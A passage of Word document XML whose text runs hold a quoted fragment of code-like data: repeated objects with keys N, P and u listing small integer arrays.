    <w:p w14:paraId="3A7628CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62085BDF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B96F92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [72, 73]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA3404" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA6095" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054819E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A15C034" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B6135" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D11AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC41EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196971AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3A87C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977FB9E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFCAEE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE6081" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [74, 190, 298]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59227D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188CBF00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A880F35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC448A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 10, 280]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E2545" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B089851" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C82EF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BECE3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [153]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFAD473" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B514E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF7C39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7D40D1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2C6EE9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A7CA71" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E3D2C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D9EF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D77B37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [222]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9EA388" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF454E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468DF42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16499E34" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146DF59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3247C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB8A01" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 7, 9, 11, 12, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A23DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 4, 5, 6, 8, 10, 21, 23, 91, 159, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE33B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2E54C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB36B13" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1FA946" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD8F17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275722B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DBE3FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5E6AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F7A86" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C544D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BADDDA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD996F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [6, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30541BBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B897B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A05B6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E08E02" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 6, 7, 10, 17, 20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4D704" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA98AB3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AAB20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3CA02" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 22, 33, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A299155" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B94537" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A138EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4911D628" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C519240" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7064734B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8007A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40272874" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 4, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3947C5B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117862E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52763F6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C5C2B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 5, 30, 35, 174, 238, 333, 341]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118A51A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982BB3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77555F4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21363F3B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 5, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392472B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46514D0A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380556D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE07621" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2120A08A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB8BB8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC1DE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514353AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEDCEE5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426DFC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02631B01" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F9CB4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 9, 12, 193]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB66BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA0ED66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C03740" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141459E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [317, 320]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8FF73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCE281" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A2EEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28371F8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [231]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C23BD0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D815D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8AEB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B38BD5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E082CB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 25]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA7529F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019932E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FF119" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A413E6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404A3E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110B9B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B0C744" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD9613B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 4, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773F2FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163DDCF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E525EF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19114FBF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 18, 25, 89, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482D0018" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01696AEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443776D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED5E14F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 5, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31472E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13845B06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A4A834" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D5C77A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E528570" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5E5A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED88BA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471E72D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE5FAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42691769" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3ED63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6CB6E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD6F3FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [1, 2]</w:t>
      </w:r>
    </w:p>
